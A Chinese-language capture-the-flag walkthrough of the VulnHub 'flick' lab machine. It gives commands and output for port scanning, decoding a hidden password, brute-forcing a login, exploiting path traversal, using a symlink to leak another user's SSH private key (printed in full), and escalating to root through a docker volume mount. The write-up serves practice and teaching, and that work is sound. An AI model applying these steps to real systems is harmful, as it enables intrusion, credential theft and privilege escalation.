今天意外看到一个VulnHub上的一个靶场的WriteUp,觉得挺有意思,所以自己试着做一遍并记录下来。
下载靶场并导入到VMware中:
https://download.vulnhub.com/flick/flick.tar.gz首先使用工具扫描整个网段得到靶机IP:
fping -g 192.168.142.0/24得到靶机IP后使用Nmap工具检测服务器开放端口:
nmap -sV -p1-65535 192.168.142.35这里发现服务器开启了22,8881端口。
root@kali:/# nmap -sV -p1-65535 192.168.142.35 Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-02 17:26 CST Nmap scan report for 192.168.142.35 Host is up (0.00081s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0) 8881/tcp open galaxy4d? 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port8881-TCP:V=7.80%I=7%D=10/2%Time=5F76F239%P=x86_64-pc-linux-gnu%r(NU SF:LL,5F,"Welcome\x20to\x20the\x20admin\x20server\.\x20A\x20correct\x20pas SF:sword\x20will\x20'flick'\x20the\x20switch\x20and\x20open\x20a\x20new\x2 SF:0door:\n>\x20")%r(GetRequest,78,"Welcome\x20to\x20the\x20admin\x20serve SF:r\.\x20A\x20correct\x20password\x20will\x20'flick'\x20the\x20switch\x20 SF:and\x20open\x20a\x20new\x20door:\n>\x20OK:\x20GET\x20/\x20HTTP/1\.0\r\n SF:\r\n\n>\x20")%r(FourOhFourRequest,9B,"Welcome\x20to\x20the\x20admin\x20 SF:server\.\x20A\x20correct\x20password\x20will\x20'flick'\x20the\x20switc SF:h\x20and\x20open\x20a\x20new\x20door:\n>\x20OK:\x20GET\x20/nice ports SF:,/Trinity\.txt.bak\x20HTTP/1\.0\r\n\r\n\n>\x20")%r(GenericLines,6 SF:A,"Welcome\x20to\x20the\x20admin\x20server\.\x20A\x20correct\x20passwor SF:d\x20will\x20'flick'\x20the\x20switch\x20and\x20open\x20a\x20new\x20doo SF:r:\n>\x20OK:\x20\r\n\r\n\n>\x20")%r(HTTPOptions,7C,"Welcome\x20to\x20th SF:e\x20admin\x20server\.\x20A\x20correct\x20password\x20will\x20'flick'\x SF:20the\x20switch\x20and\x20open\x20a\x20new\x20door:\n>\x20OK:\x20OPTION SF:S\x20/\x20HTTP/1\.0\r\n\r\n\n>\x20")%r(RTSPRequest,7C,"Welcome\x20to\x2 SF:0the\x20admin\x20server\.\x20A\x20correct\x20password\x20will\x20'flick SF:'\x20the\x20switch\x20and\x20open\x20a\x20new\x20door:\n>\x20OK:\x20OPT SF:IONS\x20/\x20RTSP/1\.0\r\n\r\n\n>\x20")%r(RPCCheck,92,"Welcome\x20to\x2 SF:0the\x20admin\x20server\.\x20A\x20correct\x20password\x20will\x20'flick SF:'\x20the\x20switch\x20and\x20open\x20a\x20new\x20door:\n>\x20OK:\x20\x8 SF:0\0\0\(r\xfe\x1d\x13\0\0\0\0\0\0\0\x02\0\x01\x86\xa0\0\x01\x97\|\0\0\0\ SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\n>\x20")%r(DNSVersionBindReqTCP,86,"W SF:elcome\x20to\x20the\x20admin\x20server\.\x20A\x20correct\x20password\x2 SF:0will\x20'flick'\x20the\x20switch\x20and\x20open\x20a\x20new\x20door:\n SF:>\x20OK:\x20\0\x1e\0\x06\x01\0\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0 SF:\x10\0\x03\n>\x20")%r(DNSStatusRequestTCP,74,"Welcome\x20to\x20the\x20a SF:dmin\x20server\.\x20A\x20correct\x20password\x20will\x20'flick'\x20the\ SF:x20switch\x20and\x20open\x20a\x20new\x20door:\n>\x20OK:\x20\0\x0c\0\0\x SF:10\0\0\0\0\0\0\0\0\0\n>\x20"); MAC Address: 00:0C:29:36:25:9B (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 158.72 seconds先尝试链接服务器的ssh:
ssh 192.168.142.35得到一大串十六进制:
这里十六进制转字符后得到一大串base64,需要进行多次解码,所以我这里直接写了个脚本:
import base64 a = """ <hex> """ b = str(a).replace("\n", "") while True: try: b = base64.b64decode(b).decode('utf-8') except: break print(b)最后得到一串字符:
tabupJievas8Knoj我们在用nc尝试链接开放的8881端口
root@kali:/# nc 192.168.142.35 8881 Welcome to the admin server. A correct password will 'flick' the switch and open a new door: >链接之后告诉我们需要用密码来打开下一扇门,我们尝试将刚刚得到的明文输入进去:
root@kali:/# nc 192.168.142.35 8881 Welcome to the admin server. A correct password will 'flick' the switch and open a new door: > tabupJievas8Knoj OK: tabupJievas8Knoj Accepted! The door should be open now :poolparty:提示成功打开下一扇门,我们现在再次使用nmap扫描端口:
root@kali:/# nmap -sV -p1-65535 192.168.142.35 Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-03 13:14 CST Nmap scan report for 192.168.142.35 Host is up (0.00066s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) 8881/tcp open galaxy4d? 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port8881-TCP:V=7.80%I=7%D=10/3%Time=5F7808D9%P=x86_64-pc-linux-gnu%r(NU SF:LL,5F,"Welcome\x20to\x20the\x20admin\x20server\.\x20A\x20correct\x20pas SF:sword\x20will\x20'flick'\x20the\x20switch\x20and\x20open\x20a\x20new\x2 SF:0door:\n>\x20")%r(GetRequest,78,"Welcome\x20to\x20the\x20admin\x20serve SF:r\.\x20A\x20correct\x20password\x20will\x20'flick'\x20the\x20switch\x20 SF:and\x20open\x20a\x20new\x20door:\n>\x20OK:\x20GET\x20/\x20HTTP/1\.0\r\n SF:\r\n\n>\x20")%r(FourOhFourRequest,9B,"Welcome\x20to\x20the\x20admin\x20 SF:server\.\x20A\x20correct\x20password\x20will\x20'flick'\x20the\x20switc SF:h\x20and\x20open\x20a\x20new\x20door:\n>\x20OK:\x20GET\x20/nice ports SF:,/Trinity\.txt.bak\x20HTTP/1\.0\r\n\r\n\n>\x20")%r(GenericLines,6 SF:A,"Welcome\x20to\x20the\x20admin\x20server\.\x20A\x20correct\x20passwor SF:d\x20will\x20'flick'\x20the\x20switch\x20and\x20open\x20a\x20new\x20doo SF:r:\n>\x20OK:\x20\r\n\r\n\n>\x20")%r(HTTPOptions,7C,"Welcome\x20to\x20th SF:e\x20admin\x20server\.\x20A\x20correct\x20password\x20will\x20'flick'\x SF:20the\x20switch\x20and\x20open\x20a\x20new\x20door:\n>\x20OK:\x20OPTION SF:S\x20/\x20HTTP/1\.0\r\n\r\n\n>\x20")%r(RTSPRequest,7C,"Welcome\x20to\x2 SF:0the\x20admin\x20server\.\x20A\x20correct\x20password\x20will\x20'flick SF:'\x20the\x20switch\x20and\x20open\x20a\x20new\x20door:\n>\x20OK:\x20OPT SF:IONS\x20/\x20RTSP/1\.0\r\n\r\n\n>\x20")%r(RPCCheck,92,"Welcome\x20to\x2 SF:0the\x20admin\x20server\.\x20A\x20correct\x20password\x20will\x20'flick SF:'\x20the\x20switch\x20and\x20open\x20a\x20new\x20door:\n>\x20OK:\x20\x8 SF:0\0\0\(r\xfe\x1d\x13\0\0\0\0\0\0\0\x02\0\x01\x86\xa0\0\x01\x97\|\0\0\0\ SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\n>\x20")%r(DNSVersionBindReqTCP,86,"W SF:elcome\x20to\x20the\x20admin\x20server\.\x20A\x20correct\x20password\x2 SF:0will\x20'flick'\x20the\x20switch\x20and\x20open\x20a\x20new\x20door:\n SF:>\x20OK:\x20\0\x1e\0\x06\x01\0\0\x01\0\0\0\0\0\0\x07version\x04bind\0\0 SF:\x10\0\x03\n>\x20")%r(DNSStatusRequestTCP,74,"Welcome\x20to\x20the\x20a SF:dmin\x20server\.\x20A\x20correct\x20password\x20will\x20'flick'\x20the\ SF:x20switch\x20and\x20open\x20a\x20new\x20door:\n>\x20OK:\x20\0\x0c\0\0\x SF:10\0\0\0\0\0\0\0\0\0\n>\x20"); MAC Address: 00:0C:29:36:25:9B (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 159.43 seconds扫到80端口,我们使用浏览器访问他,得到如下页面:
我们发现这里有一个登录的界面,旁边提示说有一个测试用户,我们尝试爆破
最后得到用户名demo密码demo123
这里登录成功后我们发现有上传点,但是测试过后发现无法利用所以只能换个思路。
想了半天没有思路,参考了一下别人的WP,发现他这里的下载页面存在遍历漏洞。
这里可能做了一些防护,这里我们使用其他方法将其绕过
通过查看站点配置文件,得到数据库路径,读取其用户信息
这里我们通过查看sqlite数据库信息得到了robin与dean的密码
robin: JoofimOwEakpalv4Jijyiat5GloonTojatticEirracksIg4yijovyirtAwUjad1 dean : FumKivcenfodErk0Chezauggyokyait5fojEpCayclEcyaj2heTwef0OlNiphAnA然后链接ssh进行登录,发现robin账户的无法登入,但是dean成功登入上去:
我们cat家目录下的文件发现了message.txt和read_docker
我们首先查看message.txt,因为博主是个学渣,英语文盲,这里我就不做翻译了,这里大致意思是让使用read_docker去运行/home/robin/flick-dev下的文件
dean@flick:~$ cat message.txt -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi Dean, I will be away on leave for the next few weeks. I have asked the admin guys to write a quick script that will allow you to read my .dockerfile for flick- a-photo so that you can continue working in my absense. The .dockerfile is in my home, so the path for the script will be something like /home/robin/flick-dev/ Please call me if you have any troubles! - -- Ciao Robin -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQIcBAEBAgAGBQJT32ZsAAoJENRCTh/agc2DTNIP/0+ut1jWzk7VgJlT6tsGB0Ah yi24i2b+JAVtINzCNgJ+rXUStaAEudTvJDF28b/wZCaFVFoNJ8Q30J03FXo4SRnA ZW6HZZIGEKdlD10CcXsQrLMRmWZlBDQnCm4+EMOvavS1uU9gVvcaYhnow6uwZlwR enf71LvtS1h0+PrFgSIoItBI4/lx7BiYY9o3hJyaQWkmAZsZLWQpJtROe8wsxb1l 9o4jCJrADeJBsYM+xLExsXaEobHfKtRtsM+eipHXIWIH+l+xTi8Y1/XIlgEHCelU jUg+Hswq6SEch+1T5B+9EPoeiLT8Oi2Rc9QePSZ3n0fe4f3WJ47lEYGLLEUrKNG/ AFLSPnxHTVpHNO72KJSae0cG+jpj1OKf3ErjdTk1PMJy75ntQCrgtnGnp9xvpk0b 0xg6cESLGNkrqDGopsN/mgi6+2WKtUuO5ycwVXFImY3XYl+QVZgd/Ntpu4ZjyZUT lxqCAk/G1s43s+ySFKSoHZ8c/CuOKTsyn6uwI3NxBZPD04xfzoc0/R/UpIpUmneK q9LddBQK4vxPab8i4GNDiMp+KXyfByO864PtKQnCRkGQewanxoN0lmjB/0eKhkmf Yer1sBmumWjjxR8TBY3cVRMH93zpIIwqxRNOG6bnnSVzzza5DJuNssppCmXLOUL9 nZAuFXkGFu6cMMD4rDXQ =2moZ -----END PGP SIGNATURE----- dean@flick:~$按照信息去运行/home/robin/flick-dev下的文件:
dean@flick:~$ ./read_docker /home/robin/flick-dev # Flick-a-photo dev env RUN apt-get update && apt-get install -y php5 libapache2-mod-php5 php5-mysql php5-cli && apt-get clean && rm -rf /var/lib/apt/lists/* CMD ["/usr/sbin/apache2", "-D", "FOREGROUND"]然后我们发现并没有实质性的用处,我们把目光转移到read_docker文件中,尝试直接在当前目录运行:
dean@flick:~$ ./read_docker . ERROR: the specified docker file doesn't exist: ./Dockerfile Usage is: ./read_docker /path/to/dockerfile我们发现他是读取我们指定目录下的Dockerfile这个文件,这里我们可以尝试通过软连接去读取robin用户的任意文件。
这里我们直接将软连接指到robin用户的ssh私钥上去:
dean@flick:~$ ln -s /home/robin/.ssh/id_rsa Dockerfile dean@flick:~$ ./read_docker . -----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAlv/0uKdHFQ4oT06Kp3yg0tL1fFVl4H+iS1UOqds0HrgBCTSw ECwVwhrIFJa/u5FOPGst8t35CKo4VWX3KNHXFNVtUXWeQFpe/rB/0wi+k8E8WtXi FBjLiFOqTDL0kgXRoQzUPlYg0+LAXo5EbMq+rB2ZgMJTxunJFV2m+uKtbZZRvzU6 S1Fj6XHh/U0E68d6sZ/+y1UhSJLaFYUQMkfLtjxPa17sPZ+kwB1R4puhVTprfQOk CinfW01ot2Rj2HLMR5CpgA28dmxw8W6w0MGtXurTegj1ydFOTgB1/k4XpXnSGNO9 d2AlVR/NsKDAuYKdgRGFFh91nGZTl1p4em48YwIDAQABAoIBADI3bwhVwSL0cV1m jmAC520VcURnFhlh+PQ6lkTQvHWW1elc10yZjKbfxzhppdvYB/+52S8SuPYzvcZQ wbCWkIPCMrfLeNSH+V2UDv58wvxaYBsJVEVAtbdhs5nhvEovmzaHELKmbAZrO3R2 tbTEfEK7GUij176oExKC8bwv1GND/qQBwLtEJj/YVJSsdvrwroCde+/oJHJ76ix4 Ty8sY5rhKYih875Gx+7IZNPSDn45RsnlORm8fd5EGLML6Vm3iLfwkHIxRdj9DFoJ wJcPX7ZWTsmyJLwoHe3XKklz2KW185hIr9M2blMgrPC2ZuTnvBXmEWuy86+xxAB0 mFXYMdkCgYEAx6yab3huUTgTwReaVpysUEqy4c5nBLKqs6eRjVyC9jchQfOqo5AQ l8bd6Xdrk0lvXnVkZK0vw2zwqlk8N/vnZjfWnCa4unnv2CZXS9DLaeU6gRgRQFBI JB+zHyhus+ill4aWHitcEXiBEjUHx4roC7Al/+tr//cjwUCwlHk75F0CgYEAwZhZ gBjAo9X+/oFmYlgVebfR3kLCD4pVPMz+HyGCyjSj0+ddsHkYiHBhstBtHh9vU+Pn JMhrtR9yzXukuyQr/ns1mhEQOUtTaXrsy/1FyRBaISrtcyGAruu5yWubT0gXk2Dq rwyb6M6MbnwEMZr2mSBU5l27cTKypFqgcA58l78CgYAWM5vsXxCtGTYhFzXDAaKr PtMLBn8v54nRdgVaGXo6VEDva1+C1kbyCVutVOjyNI0cjKMACr2v1hIgbtGiS/Eb zYOgUzHhEiPX/dNhC7NCcAmERx/L7eFHmvq4sS81891NrtpMOnf/PU3kr17REiHh AtIG1a9pg5pHJ6E6sQw2xQKBgHXeqm+BopieDFkstAeglcK8Fr16a+lGUktojDis EJPIpQ65yaNOt48qzXEv0aALh57OHceZd2qZsS5G369JgLe6kJIzXWtk325Td6Vj mX+nwxh6qIP2nADkaQOnzrHgtOn4kiruRGbki0AhpfQF46qrssVnwF5Vfcrvmstf JqDFAoGBAI9KJamhco8BBka0PUWgJ3R2ZqE1viTvyME1G25h7tJb17cIeB/PeTS1 Q9KMFl61gpl0J4rJEIakeGpXuehwYAzNBv7n6yr8CNDNkET/cVhp+LCmbS91FwAK VP0mqDppzOZ04B9FQD8Af6kUzxzGFH8tAN5SNYSW88I9Z8lVpfkn -----END RSA PRIVATE KEY-----这里我们直接通过密钥去SSH登入Robin用户:
Permissions 0644 for 'id_rsa' are too open. It is required that your private key files are NOT accessible by others. This private key will be ignored. Load key "id_rsa": bad permissions这里如果出现报错的话是要将密钥文件的权限修改一下,然后在进行登入
root@kali:/# chmod 600 id_rsa root@kali:/# ssh -i id_rsa robin@192.168.142.35 load pubkey "id_rsa": invalid format登录成功后,开始提权
这里的提权我完全没有头绪,参考大佬的WP后,发现是用docker提权
这里使用docker命令将主机上的/root目录挂载到映像中的/root中去,以此得到电脑的root权限:
robin@flick:~$ docker run -t -i -v /root:/root ubuntu /bin/bash root@12a586efd780:/#然后查看flag:
root@12a586efd780:/# cd /root/ root@12a586efd780:/root# cat flag.txt Errr, you are close, but this is not the flag you are looking for. root@12a586efd780:/root# cat .aptitude/ .bash_history .bashrc .cache/ .profile .viminfo 53ca1c96115a7c156b14306b81df8f34e8a4bf8933cb687bd9334616f475dcbc/ flag.txt root@12a586efd780:/root# cat 53ca1c96115a7c156b14306b81df8f34e8a4bf8933cb687bd9334616f475dcbc/real_flag.txt Congrats! You have completed 'flick'! I hope you have enjoyed doing it as much as I did creating it :) ciao for now! @leonjza root@12a586efd780:/root#